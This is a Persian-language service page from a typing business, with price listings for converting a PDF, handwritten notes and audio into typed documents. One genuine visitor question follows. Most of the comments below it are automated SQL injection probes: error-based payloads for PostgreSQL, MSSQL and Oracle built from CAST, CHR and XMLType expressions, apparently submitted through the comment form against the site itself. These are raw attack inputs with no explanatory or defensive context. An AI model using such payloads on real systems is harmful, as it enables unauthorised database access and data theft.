لطفا هزینه و قیمت پیشنهادی خود برای استعلام قیمت تایپ 15صفحه pdf به ورد را در پیشنهادات همین پست وارد نمایید.

جزوه دست نویس

5000 هزارتومان
 • زمان مناسب
 • خوانا بودن دست نویس
ویژه

تبدیل فایل صوتی به جزوه

90000 تومان
 • عمومی
 • تخصصی

117 پاسخ

 1. سلام خسته نباشید بندهیه نظر دارن هزینه های تایپ هم بزنید که چقدر دستمزد میدید

 2. LXCs’) AND 4207=CAST((CHR(113)||CHR(118)||CHR(113)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4207=4207) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113)) AS NUMERIC) AND (‘NAwy’=’NAwy

 3. LXCs) AND 4207=CAST((CHR(113)||CHR(118)||CHR(113)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4207=4207) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113)) AS NUMERIC) AND (8775=8775

 4. LXCs AND 4207=CAST((CHR(113)||CHR(118)||CHR(113)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4207=4207) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113)) AS NUMERIC)

 5. LXCs AND 4207=CAST((CHR(113)||CHR(118)||CHR(113)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4207=4207) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113)) AS NUMERIC)– PMEQ

 6. LXCs’ AND 7528 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7528=7528) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113))) AND ‘cqEI’=’cqEI

 7. LXCs) AND 7528 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7528=7528) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113))) AND (4814=4814

 8. LXCs’) AND 8644=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(113)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (8644=8644) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (‘cQWB’=’cQWB

 9. LXCs) AND 8644=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(113)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (8644=8644) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (4192=4192

 10. AND 4692=CAST((CHR(113)||CHR(118)||CHR(113)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4692=4692) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113)) AS NUMERIC) گفت:

  LXCs

 11. ') AND 4692=CAST((CHR(113)||CHR(118)||CHR(113)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4692=4692) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113)) AS NUMERIC) AND ('awMs'='awMs گفت:

  LXCs

 12. AND 4692=CAST((CHR(113)||CHR(118)||CHR(113)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (4692=4692) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113)) AS NUMERIC)-- UpmW گفت:

  LXCs

 13. ) AND 3280 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (3280=3280) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113))) AND (7735=7735 گفت:

  LXCs

 14. AND 3280 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (3280=3280) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113))) گفت:

  LXCs

 15. ' AND 3280 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (3280=3280) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'sACv'='sACv گفت:

  LXCs

 16. AND 9104=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(113)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9104=9104) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) گفت:

  LXCs

 17. AND 9104=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(113)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9104=9104) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(122)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)-- cYSj گفت:

  LXCs

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *